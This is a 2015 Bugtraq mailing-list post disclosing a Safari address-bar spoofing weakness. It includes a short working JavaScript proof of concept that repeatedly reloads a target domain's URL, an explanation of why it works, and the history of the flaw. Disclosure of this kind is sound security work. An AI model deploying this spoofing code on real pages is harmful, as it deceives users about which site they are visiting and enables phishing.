lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <556EB1B4.7020104@deusen.co.uk>
Date: Wed, 03 Jun 2015 15:50:12 +0800
From: David Leo <david.leo@...sen.co.uk>
To: bugtraq@...urityfocus.com
Subject: Safari Address Spoofing - Impact, Code, How It Works, History

Impact:
"It works on fully patched versions of iOS and OS X"
Reference:
http://arstechnica.com/security/2015/05/safari-address-spoofing-bug-could-be-used-in-phishing-malware-attacks/

Code(JavaScript):
function f()
{
	location="http://www.dailymail.co.uk/home/index.html?random="+Math.random();
}
setInterval("f()",10);

It's online:
http://www.deusen.co.uk/items/iwhere.9500182225526788/

How It Works:
Just keep trying to load the web page of target domain.
Safari changes address bar to new URL,
BEFORE new content is loaded.

History

Michal Zalewski pointed out
the weakness is five years old(at least):
http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html
"Safari...
always showing the new destination...
can be deceptive"

We pointed out
his Safari code does not work in real attack...
If you change "http://1.2.3.4/" in your Safari code:
some URL in the real world(for example, dailymail.co.uk).
Your code won't work(page of target domain is simply loaded).

Conclusion:
The weakness is very old.
Deusen's method to use this weakness is new.

Kind Regards,

__________
BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ